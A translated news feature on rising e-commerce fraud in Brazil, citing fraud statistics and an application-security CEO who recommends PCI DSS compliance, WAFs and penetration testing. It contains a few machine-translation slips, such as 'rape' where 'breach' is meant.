An innocent click, an unpretentious purchase, an unmissable discount. Everything seems safe, until the bill arrives with an amount you don’t recognize. Behind the scenes of e-commerce, while consumers enjoy the convenience of digital, an invisible war is waged every day against increasingly sophisticated scams.
By 2024, more than half of Brazilians had been victims of some type of fraud, according to Serasa Experian. And the impact is real: 54.2% reported financial loss, many of them without even realizing the scam. While fraud used to be massive and blatant, today it’s surgical, silent, and expensive. The average ticket price for these scams has increased by 30% and now exceeds R$1,300 per order.
Crime has evolved, and digital security needs to keep up. E-commerce is the new playground for cybercriminals. Data from Febraban (Brazilian Bank of Brazil) shows that financial losses from digital fraud in Brazil reached R$10.1 billion in 2024, 17% more than the previous year. “The digital environment, especially for e-commerce, has become a minefield,” warns Wagner Elias, CEO of Conviso, a company specializing in application security.
And the enemy doesn’t sleep. Threats are varied, from phishing attacks (which account for 15% of cases) to the use of stolen credentials (16%), and even malicious insiders, with the latter having an average cost per breach of US$4.99 million, the highest on the list.
Elias explains that some of the most popular techniques are digital skimming and account takeover (ATO). In skimming, the criminal injects malicious code directly into the payment page. In ATO, the scam is more methodical and methodical: using leaked credentials, they access real accounts, change passwords, and make purchases. According to the company AllowMe, 72% of digital retail fraud comes from these unauthorized accesses.
Their preferred targets? Games, cell phones, computers, and electronics—products with high liquidity on the informal market and easy resale. Meanwhile, scammers’ preferred payment methods continue to be credit cards. The reason is simple: quick purchases, minimal verification, and only discovered when the bill arrives.
THE FIGHT
And what can be done? The answer lies in technology and, above all, in security planning from the beginning of application development. “The answer lies in technology, yes, but above all, in how it’s implemented. Leaving security considerations until the system is up and running is a fatal mistake. Practices like PCI DSS must be incorporated from the beginning of development and investment in tools like WAFs to protect websites against real-time attacks,” says Wagner Elias.
This is where tools like WAFs (Web Application Firewalls) come in, which monitor traffic in real time, block suspicious patterns, and protect websites from attacks like code injection and unauthorized access. The use of AI (Artificial Intelligence) has also been important in anticipating malicious behavior, reducing breach costs by up to $2.2 million, according to IBM’s “Cost of a Data Breach 2024” study.
Another essential point is the use of practices compliant with PCI DSS (Payment Card Industry Data Security Standard), a set of international standards that help protect card transactions. “Companies that operate with payment data must, both by obligation and for business intelligence, strictly follow PCI. This is what separates a secure system from an open door to fraud,” adds Elias.
Even with technological advancements, the average time to contain a breach is still long: 258 days. In the case of stolen credentials, it can reach 292 days, almost a year. Part of the blame lies with the shortage of specialized professionals, which increased 26.2% last year, increasing the cost of breaches by $1.76 million.
However, the expert warns: those who invest in automation, security from the ground up, and attack simulations—known as penetration tests—have a better chance of emerging unscathed or, at least, reducing the damage.
Reports from leading cybersecurity authorities confirm the effectiveness of PCI DSS and WAF protection: according to Verizon’s DBIR 2024, PCI DSS compliance reduces security incidents by 52%, while WAFs block up to 80% of web application attacks. IBM’s Cost of a Data Breach 2023 study reveals that companies with WAFs save $1.4 million per breach, and PCI DSS speeds up breach response time by 54%. When combined, these solutions can reduce financial losses by up to 75%, according to the Ponemon Institute (2024).
“Thus, companies that follow the PCI DSS standard have half the problems with data breaches, and Web Application Firewalls (WAFs) prevent 8 out of 10 hacker attacks. Those who use both technologies together limit financial losses to just 25% of the amount normally expected after breaches,” he explains.
In the US, a rape costs an average of US$9.36 million, the highest in the world for the 14th year in a row. There, 63% of companies already admit they will pass this cost on to customers, which shows that investing in security isn’t just a precaution: it’s a matter of competitiveness and image. Elias concludes: “In times of booming e-commerce and valuable data, ignoring digital security means leaving money on the table, compromising revenue and reputation at the same time. It also means losing customer trust and brand credibility.”
